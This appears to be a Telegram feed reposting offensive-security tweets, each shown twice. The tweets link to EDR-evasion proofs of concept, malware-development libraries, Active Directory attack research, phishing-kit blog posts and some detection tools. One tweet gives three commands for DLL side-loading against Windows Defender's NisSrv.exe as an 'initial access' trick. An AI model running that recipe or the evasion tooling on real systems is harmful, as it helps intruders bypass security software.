😈 [ NinjaParanoid, Chetan Nayak (Brute Ratel C4) ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
🔗 https://www.youtube.com/watch?v=qakZwswi5Jw
🐥 [ tweet ]
Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining it's hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!
https://t.co/WdS0z4PSyD
🔗 https://www.youtube.com/watch?v=qakZwswi5Jw
🐥 [ tweet ]
😈 [ ORCA10K, ORCA ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
🔗 https://gitlab.com/ORCA000/perunsfart
🐥 [ tweet ]
Released a poc on Perun's Fart by #sektor7, that patch ntdll, with a new one read from a suspended process, thus unhooking your syscalls
https://t.co/y3LKQrwOJL
🔗 https://gitlab.com/ORCA000/perunsfart
🐥 [ tweet ]
😈 [ BlWasp_, BlackWasp ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
🔗 https://github.com/Porchetta-Industries/CrackMapExec/pull/610
🐥 [ tweet ]
PAPAPA NOUVELLE PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in a LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA
🔗 https://github.com/Porchetta-Industries/CrackMapExec/pull/610
🐥 [ tweet ]
😈 [ HuskyHacksMK, Matt | HuskyHacks ]
🔬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
📚Lesson: https://t.co/cIuqUKd4Fw
🦠Lab Repo: https://t.co/apbskSMBkY
🔗 https://notes.huskyhacks.dev/notes/on-patching-binaries
🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
🐥 [ tweet ]
🔬A new section has been added to PMAT and it's available for everyone!
I've added a new sample to teach simple x86 binary patching methodology.
📚Lesson: https://t.co/cIuqUKd4Fw
🦠Lab Repo: https://t.co/apbskSMBkY
🔗 https://notes.huskyhacks.dev/notes/on-patching-binaries
🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe
🐥 [ tweet ]
😈 [ httpyxel, yxel ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
🔗 https://github.com/janoglezcampos/DeathSleep
🐥 [ tweet ]
DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8
🔗 https://github.com/janoglezcampos/DeathSleep
🐥 [ tweet ]
😈 [ DirectoryRanger, DirectoryRanger ]
Good series by @martinsohndk:
🔗 https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
🐥 [ tweet ]
Good series by @martinsohndk:
🔗 https://improsec.com/tech-blog/o83i79jgzk65bbwn1fwib1ela0rl2d
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent
🔗 https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted
🐥 [ tweet ]
😈 [ ShitSecure, S3cur3Th1sSh1t ]
Really like the “Malware Dev” posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics 👌🔥
https://t.co/iRl72r4yz9
🔗 https://0xpat.github.io/
🐥 [ tweet ]
Really like the “Malware Dev” posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics 👌🔥
https://t.co/iRl72r4yz9
🔗 https://0xpat.github.io/
🐥 [ tweet ]
😈 [ podalirius_, Podalirius ]
[#thread 🧵] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! 🎉
https://t.co/EOWfTbFCRh
🔗 https://github.com/p0dalirius/ApacheTomcatScanner/
🐥 [ tweet ]
[#thread 🧵] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed to be able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! 🎉
https://t.co/EOWfTbFCRh
🔗 https://github.com/p0dalirius/ApacheTomcatScanner/
🐥 [ tweet ]
😈 [ mariuszbit, mgeeky | Mariusz Banach ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access 🔥
🐥 [ tweet ][ quote ]
Can confirm - a nice DLL side-loading against Defender's executable.
Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public
Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp
Step 3:
"%WinDir%\Users\Public\NisSrv.exe"
Tasty Initial Access 🔥
🐥 [ tweet ][ quote ]
😈 [ ORCA10K, ORCA ]
decided to build libraries to help in malware development, so far I've done only little, but here it is:
https://t.co/d0AfK2ypr0
🔗 https://github.com/MalwareApiLib/MalwareApiLibrary
🐥 [ tweet ]
decided to build libraries to help in malware development, so far I've done only little, but here it is:
https://t.co/d0AfK2ypr0
🔗 https://github.com/MalwareApiLib/MalwareApiLibrary
🐥 [ tweet ]
😈 [ MDSecLabs, MDSec ]
"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq
🔗 https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/
🐥 [ tweet ]
"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq
🔗 https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/
🐥 [ tweet ]
😈 [ R0h1rr1m, Furkan Göksel ]
Another technique which is Call Stack Spoofing is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf 's PoC and blogpost. You can find the repository below.
https://t.co/R7y34dQaYu
🔗 https://github.com/frkngksl/NimicStack
🐥 [ tweet ]
Another technique which is Call Stack Spoofing is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf 's PoC and blogpost. You can find the repository below.
https://t.co/R7y34dQaYu
🔗 https://github.com/frkngksl/NimicStack
🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]
[#HackTip ⚒] Such a tiny code snippet that can help you bypass some automatic sandbox detections ⏳
#maldev
🐥 [ tweet ]
[#HackTip ⚒] Such a tiny code snippet that can help you bypass some automatic sandbox detections ⏳
#maldev
🐥 [ tweet ]
😈 [ SemperisTech, Semperis ]
Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory--and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn
🔗 https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/
🐥 [ tweet ]
Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory--and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn
🔗 https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/
🐥 [ tweet ]
😈 [ s4ntiago_p, S4ntiagoP ]
A small blogpost (and PoC) about creating Windows processes using syscalls 😊
https://t.co/P5isRGOnN7
🔗 https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls
🐥 [ tweet ]
A small blogpost (and PoC) about creating Windows processes using syscalls 😊
https://t.co/P5isRGOnN7
🔗 https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls
🐥 [ tweet ]
😈 [ _RastaMouse, Rasta Mouse ]
[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.
https://t.co/8gShYwEyPY
🔗 https://rastamouse.me/evilginx-meet-bitb/
🐥 [ tweet ]
[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.
https://t.co/8gShYwEyPY
🔗 https://rastamouse.me/evilginx-meet-bitb/
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ MDSecLabs, MDSec ]
In part 3 of our "How I Met Your Beacon" series, @domchell analyses techniques to detect Brute Ratel https://t.co/4wNtM5mNH7 #brc4
🔗 https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
🐥 [ tweet ]
In part 3 of our "How I Met Your Beacon" series, @domchell analyses techniques to detect Brute Ratel https://t.co/4wNtM5mNH7 #brc4
🔗 https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
🐥 [ tweet ]
😈 [ last0x00, last ]
After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt persistences implanted in their Windows machines. Check it out!
https://t.co/oma0h8gFfF
🔗 https://github.com/last-byte/PersistenceSniper/
🐥 [ tweet ]
After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt persistences implanted in their Windows machines. Check it out!
https://t.co/oma0h8gFfF
🔗 https://github.com/last-byte/PersistenceSniper/
🐥 [ tweet ]
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Спасибо @snovvcrash, снова запостил годный материал
https://habr.com/ru/company/angarasecurity/blog/680138/
#pentest #redteam #ad
https://habr.com/ru/company/angarasecurity/blog/680138/
#pentest #redteam #ad
Хабр
Делегируй меня полностью, или Новый взгляд на RBCD-атаки в AD
«Злоупотребление ограниченным делегированием Kerberos на основе ресурсов» — как много в этом звуке! Точнее уже не просто звуке и даже не словосочетании, а целом классе наступательных техник в доменной...
😈 [ praetorianlabs, Praetorian ]
Anatomy of an automotive security assessment that help protect life and limb
https://t.co/cg7pAq5Luz
#automotivesecurity #carhacking
🔗 https://www.praetorian.com/blog/automotive-security-assessment-anatomy/
🐥 [ tweet ]
Anatomy of an automotive security assessment that help protect life and limb
https://t.co/cg7pAq5Luz
#automotivesecurity #carhacking
🔗 https://www.praetorian.com/blog/automotive-security-assessment-anatomy/
🐥 [ tweet ]